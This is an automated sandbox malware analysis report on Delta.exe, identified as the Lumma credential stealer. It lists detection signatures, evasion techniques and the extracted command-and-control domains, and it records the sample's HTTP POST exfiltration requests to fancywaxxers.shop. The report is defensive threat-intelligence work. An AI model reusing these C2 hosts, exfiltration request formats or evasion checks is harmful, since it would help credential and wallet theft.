Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Delta.exe

Overview

General Information

Sample name:Delta.exe
Analysis ID:1582864
MD5:24a858ebb9fc24d58bb3615386ce0f43
SHA1:eaf287a3846ac77a908d4ec4468a49fedc207963
SHA256:ddd1e3c7b4d8a8670e7c6d9a3bbd7e30d1c5658ed38e41a20efdee201b5239f7
Tags:exeLummaStealeruser-aachum
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
LummaC encrypted strings found
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to detect virtual machines (STR)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • Delta.exe (PID: 7332 cmdline: "C:\Users\user\Desktop\Delta.exe" MD5: 24A858EBB9FC24D58BB3615386CE0F43)
    • conhost.exe (PID: 7340 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Delta.exe (PID: 7396 cmdline: "C:\Users\user\Desktop\Delta.exe" MD5: 24A858EBB9FC24D58BB3615386CE0F43)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["fancywaxxers.shop", "abruptyopsn.shop", "wholersorie.shop", "cloudewahsj.shop", "tirepublicerj.shop", "noisycuttej.shop", "framekgirus.shop", "rabidcowse.shop", "nearycrepso.shop"], "Build id": "yau6Na--914510980"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      Process Memory Space: Delta.exe PID: 7396JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
        Process Memory Space: Delta.exe PID: 7396JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Process Memory Space: Delta.exe PID: 7396JoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
            Process Memory Space: Delta.exe PID: 7396JoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
              decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
                No Sigma rule has matched
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-31T17:21:14.939261+010020283713Unknown Traffic192.168.2.449730104.21.96.1443TCP
                2024-12-31T17:21:15.933780+010020283713Unknown Traffic192.168.2.449731104.21.96.1443TCP
                2024-12-31T17:21:17.121915+010020283713Unknown Traffic192.168.2.449732104.21.96.1443TCP
                2024-12-31T17:21:18.350782+010020283713Unknown Traffic192.168.2.449733104.21.96.1443TCP
                2024-12-31T17:21:19.635018+010020283713Unknown Traffic192.168.2.449734104.21.96.1443TCP
                2024-12-31T17:21:21.084859+010020283713Unknown Traffic192.168.2.449735104.21.96.1443TCP
                2024-12-31T17:21:22.466515+010020283713Unknown Traffic192.168.2.449736104.21.96.1443TCP
                2024-12-31T17:21:24.584267+010020283713Unknown Traffic192.168.2.449737104.21.96.1443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-31T17:21:15.444803+010020546531A Network Trojan was detected192.168.2.449730104.21.96.1443TCP
                2024-12-31T17:21:16.398944+010020546531A Network Trojan was detected192.168.2.449731104.21.96.1443TCP
                2024-12-31T17:21:25.028327+010020546531A Network Trojan was detected192.168.2.449737104.21.96.1443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-31T17:21:15.444803+010020498361A Network Trojan was detected192.168.2.449730104.21.96.1443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-31T17:21:16.398944+010020498121A Network Trojan was detected192.168.2.449731104.21.96.1443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-31T17:21:14.939261+010020586571Domain Observed Used for C2 Detected192.168.2.449730104.21.96.1443TCP
                2024-12-31T17:21:15.933780+010020586571Domain Observed Used for C2 Detected192.168.2.449731104.21.96.1443TCP
                2024-12-31T17:21:17.121915+010020586571Domain Observed Used for C2 Detected192.168.2.449732104.21.96.1443TCP
                2024-12-31T17:21:18.350782+010020586571Domain Observed Used for C2 Detected192.168.2.449733104.21.96.1443TCP
                2024-12-31T17:21:19.635018+010020586571Domain Observed Used for C2 Detected192.168.2.449734104.21.96.1443TCP
                2024-12-31T17:21:21.084859+010020586571Domain Observed Used for C2 Detected192.168.2.449735104.21.96.1443TCP
                2024-12-31T17:21:22.466515+010020586571Domain Observed Used for C2 Detected192.168.2.449736104.21.96.1443TCP
                2024-12-31T17:21:24.584267+010020586571Domain Observed Used for C2 Detected192.168.2.449737104.21.96.1443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-31T17:21:14.445250+010020586561Domain Observed Used for C2 Detected192.168.2.4597571.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-31T17:21:17.787374+010020480941Malware Command and Control Activity Detected192.168.2.449732104.21.96.1443TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: https://fancywaxxers.shop/apigAvira URL Cloud: Label: malware
                Source: https://fancywaxxers.shop/apiSAvira URL Cloud: Label: malware
                Source: https://fancywaxxers.shop/wAvira URL Cloud: Label: malware
                Source: https://fancywaxxers.shop/oft.cocAvira URL Cloud: Label: malware
                Source: https://fancywaxxers.shop/llAvira URL Cloud: Label: malware
                Source: https://fancywaxxers.shop/api3Avira URL Cloud: Label: malware
                Source: https://fancywaxxers.shop/5Avira URL Cloud: Label: malware
                Source: https://fancywaxxers.shop/microsAvira URL Cloud: Label: malware
                Source: https://fancywaxxers.shop/CAvira URL Cloud: Label: malware
                Source: https://fancywaxxers.shop/kAvira URL Cloud: Label: malware
                Source: https://fancywaxxers.shop:443/apiUserUserUserAvira URL Cloud: Label: malware
                Source: https://fancywaxxers.shop/api:Avira URL Cloud: Label: malware
                Source: https://fancywaxxers.shop/3Avira URL Cloud: Label: malware
                Source: 00000000.00000002.1693712491.0000000002C89000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: LummaC {"C2 url": ["fancywaxxers.shop", "abruptyopsn.shop", "wholersorie.shop", "cloudewahsj.shop", "tirepublicerj.shop", "noisycuttej.shop", "framekgirus.shop", "rabidcowse.shop", "nearycrepso.shop"], "Build id": "yau6Na--914510980"}
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 83.7% probability
                Source: Delta.exeJoe Sandbox ML: detected
                Source: 00000000.00000002.1693712491.0000000002C89000.00000004.00000020.00020000.00000000.sdmpString decryptor: cloudewahsj.shop
                Source: 00000000.00000002.1693712491.0000000002C89000.00000004.00000020.00020000.00000000.sdmpString decryptor: rabidcowse.shop
                Source: 00000000.00000002.1693712491.0000000002C89000.00000004.00000020.00020000.00000000.sdmpString decryptor: noisycuttej.shop
                Source: 00000000.00000002.1693712491.0000000002C89000.00000004.00000020.00020000.00000000.sdmpString decryptor: tirepublicerj.shop
                Source: 00000000.00000002.1693712491.0000000002C89000.00000004.00000020.00020000.00000000.sdmpString decryptor: framekgirus.shop
                Source: 00000000.00000002.1693712491.0000000002C89000.00000004.00000020.00020000.00000000.sdmpString decryptor: wholersorie.shop
                Source: 00000000.00000002.1693712491.0000000002C89000.00000004.00000020.00020000.00000000.sdmpString decryptor: abruptyopsn.shop
                Source: 00000000.00000002.1693712491.0000000002C89000.00000004.00000020.00020000.00000000.sdmpString decryptor: nearycrepso.shop
                Source: 00000000.00000002.1693712491.0000000002C89000.00000004.00000020.00020000.00000000.sdmpString decryptor: fancywaxxers.shop
                Source: 00000000.00000002.1693712491.0000000002C89000.00000004.00000020.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
                Source: 00000000.00000002.1693712491.0000000002C89000.00000004.00000020.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
                Source: 00000000.00000002.1693712491.0000000002C89000.00000004.00000020.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
                Source: 00000000.00000002.1693712491.0000000002C89000.00000004.00000020.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
                Source: 00000000.00000002.1693712491.0000000002C89000.00000004.00000020.00020000.00000000.sdmpString decryptor: Workgroup: -
                Source: 00000000.00000002.1693712491.0000000002C89000.00000004.00000020.00020000.00000000.sdmpString decryptor: yau6Na--914510980
                Source: Delta.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49730 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49731 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49732 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49733 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49734 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49735 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49736 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49737 version: TLS 1.2
                Source: C:\Users\user\Desktop\Delta.exeCode function: 0_2_005FB6E8 FindFirstFileExW,0_2_005FB6E8
                Source: C:\Users\user\Desktop\Delta.exeCode function: 0_2_005FB799 FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_005FB799

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2058656 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fancywaxxers .shop) : 192.168.2.4:59757 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058657 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) : 192.168.2.4:49732 -> 104.21.96.1:443
                Source: Network trafficSuricata IDS: 2058657 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) : 192.168.2.4:49737 -> 104.21.96.1:443
                Source: Network trafficSuricata IDS: 2058657 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) : 192.168.2.4:49735 -> 104.21.96.1:443
                Source: Network trafficSuricata IDS: 2058657 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) : 192.168.2.4:49736 -> 104.21.96.1:443
                Source: Network trafficSuricata IDS: 2058657 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) : 192.168.2.4:49731 -> 104.21.96.1:443
                Source: Network trafficSuricata IDS: 2058657 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) : 192.168.2.4:49730 -> 104.21.96.1:443
                Source: Network trafficSuricata IDS: 2058657 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) : 192.168.2.4:49733 -> 104.21.96.1:443
                Source: Network trafficSuricata IDS: 2058657 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) : 192.168.2.4:49734 -> 104.21.96.1:443
                Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49730 -> 104.21.96.1:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49730 -> 104.21.96.1:443
                Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49731 -> 104.21.96.1:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49731 -> 104.21.96.1:443
                Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49732 -> 104.21.96.1:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49737 -> 104.21.96.1:443
                Source: Malware configuration extractorURLs: fancywaxxers.shop
                Source: Malware configuration extractorURLs: abruptyopsn.shop
                Source: Malware configuration extractorURLs: wholersorie.shop
                Source: Malware configuration extractorURLs: cloudewahsj.shop
                Source: Malware configuration extractorURLs: tirepublicerj.shop
                Source: Malware configuration extractorURLs: noisycuttej.shop
                Source: Malware configuration extractorURLs: framekgirus.shop
                Source: Malware configuration extractorURLs: rabidcowse.shop
                Source: Malware configuration extractorURLs: nearycrepso.shop
                Source: Joe Sandbox ViewIP Address: 104.21.96.1 104.21.96.1
                Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49732 -> 104.21.96.1:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49737 -> 104.21.96.1:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49735 -> 104.21.96.1:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49736 -> 104.21.96.1:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49731 -> 104.21.96.1:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49733 -> 104.21.96.1:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49734 -> 104.21.96.1:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49730 -> 104.21.96.1:443
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: fancywaxxers.shop
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 51Host: fancywaxxers.shop
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=Y1RVV8N9OI1NTOUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18143Host: fancywaxxers.shop
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=NF7LH923VBKDH6VCEBUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8788Host: fancywaxxers.shop
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=VRRPKLD6B8VDDDLB5User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20435Host: fancywaxxers.shop
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=NOJU2OM03User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1210Host: fancywaxxers.shop
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=G2X9029E03VFYHYSCUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 549515Host: fancywaxxers.shop
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 86Host: fancywaxxers.shop
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficDNS traffic detected: DNS query: fancywaxxers.shop
                Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: fancywaxxers.shop
                Source: Delta.exe, 00000002.00000003.1740469289.000000000547C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                Source: Delta.exe, 00000002.00000003.1740469289.000000000547C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                Source: Delta.exe, 00000002.00000003.1740469289.000000000547C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                Source: Delta.exe, 00000002.00000003.1740469289.000000000547C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                Source: Delta.exe, 00000002.00000003.1740469289.000000000547C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                Source: Delta.exe, 00000002.00000003.1740469289.000000000547C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                Source: Delta.exe, 00000002.00000003.1740469289.000000000547C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                Source: Delta.exe, 00000002.00000003.1740469289.000000000547C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                Source: Delta.exe, 00000002.00000003.1740469289.000000000547C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                Source: Delta.exe, 00000002.00000003.1715106339.0000000002C30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.coc
                Source: Delta.exe, 00000002.00000003.1740469289.000000000547C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                Source: Delta.exe, 00000002.00000003.1740469289.000000000547C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                Source: Delta.exe, 00000002.00000003.1715767224.000000000546B000.00000004.00000800.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.1715832987.0000000005469000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: Delta.exe, 00000002.00000003.1741709649.0000000005421000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
                Source: Delta.exe, 00000002.00000003.1715767224.000000000546B000.00000004.00000800.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.1715832987.0000000005469000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: Delta.exe, 00000002.00000003.1715767224.000000000546B000.00000004.00000800.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.1715832987.0000000005469000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: Delta.exe, 00000002.00000003.1715767224.000000000546B000.00000004.00000800.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.1715832987.0000000005469000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: Delta.exe, 00000002.00000003.1741709649.0000000005421000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
                Source: Delta.exe, 00000002.00000003.1715767224.000000000546B000.00000004.00000800.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.1715832987.0000000005469000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: Delta.exe, 00000002.00000003.1715767224.000000000546B000.00000004.00000800.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.1715832987.0000000005469000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: Delta.exe, 00000002.00000003.1715767224.000000000546B000.00000004.00000800.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.1715832987.0000000005469000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: Delta.exe, 00000002.00000003.1768871713.0000000002CA5000.00000004.00000020.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.2328527402.0000000002C35000.00000004.00000020.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.1775221724.0000000002CA5000.00000004.00000020.00020000.00000000.sdmp, Delta.exe, 00000002.00000002.2943435451.0000000002C37000.00000004.00000020.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.1791271518.0000000002CA5000.00000004.00000020.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.1715106339.0000000002C30000.00000004.00000020.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.2328436465.0000000002C30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fancywaxxers.shop/
                Source: Delta.exe, 00000002.00000003.1768871713.0000000002CA5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fancywaxxers.shop/3
                Source: Delta.exe, 00000002.00000003.1715106339.0000000002C1C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fancywaxxers.shop/5
                Source: Delta.exe, 00000002.00000003.2328378650.0000000002C82000.00000004.00000020.00020000.00000000.sdmp, Delta.exe, 00000002.00000002.2943650597.0000000002CA5000.00000004.00000020.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.2328560798.0000000002CA4000.00000004.00000020.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.2328409776.0000000002C8A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fancywaxxers.shop/C
                Source: Delta.exe, 00000002.00000003.2328436465.0000000002C30000.00000004.00000020.00020000.00000000.sdmp, Delta.exe, 00000002.00000002.2943435451.0000000002C30000.00000004.00000020.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.2328409776.0000000002C8A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fancywaxxers.shop/api
                Source: Delta.exe, 00000002.00000003.2328527402.0000000002C35000.00000004.00000020.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.1756296005.0000000002C30000.00000004.00000020.00020000.00000000.sdmp, Delta.exe, 00000002.00000002.2943435451.0000000002C37000.00000004.00000020.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.1791071888.0000000002C30000.00000004.00000020.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.2328436465.0000000002C30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fancywaxxers.shop/api3
                Source: Delta.exe, 00000002.00000002.2943602856.0000000002C8D000.00000004.00000020.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.2328378650.0000000002C82000.00000004.00000020.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.2328409776.0000000002C8A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fancywaxxers.shop/api:
                Source: Delta.exe, 00000002.00000003.2328527402.0000000002C35000.00000004.00000020.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.1756296005.0000000002C30000.00000004.00000020.00020000.00000000.sdmp, Delta.exe, 00000002.00000002.2943435451.0000000002C37000.00000004.00000020.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.1791071888.0000000002C30000.00000004.00000020.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.1768823100.0000000002C30000.00000004.00000020.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.1755336348.0000000002C30000.00000004.00000020.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.2328436465.0000000002C30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fancywaxxers.shop/apiS
                Source: Delta.exe, 00000002.00000003.1715106339.0000000002C30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fancywaxxers.shop/apig
                Source: Delta.exe, 00000002.00000003.1775221724.0000000002CA5000.00000004.00000020.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.1791271518.0000000002CA5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fancywaxxers.shop/k
                Source: Delta.exe, 00000002.00000003.2328527402.0000000002C35000.00000004.00000020.00020000.00000000.sdmp, Delta.exe, 00000002.00000002.2943435451.0000000002C37000.00000004.00000020.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.1791071888.0000000002C30000.00000004.00000020.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.2328436465.0000000002C30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fancywaxxers.shop/ll
                Source: Delta.exe, 00000002.00000003.1715106339.0000000002C30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fancywaxxers.shop/micros
                Source: Delta.exe, 00000002.00000003.2328527402.0000000002C35000.00000004.00000020.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.1756296005.0000000002C30000.00000004.00000020.00020000.00000000.sdmp, Delta.exe, 00000002.00000002.2943435451.0000000002C37000.00000004.00000020.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.1791071888.0000000002C30000.00000004.00000020.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.1768823100.0000000002C30000.00000004.00000020.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.1755336348.0000000002C30000.00000004.00000020.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.2328436465.0000000002C30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fancywaxxers.shop/oft.coc
                Source: Delta.exe, 00000002.00000003.1715106339.0000000002C30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fancywaxxers.shop/w
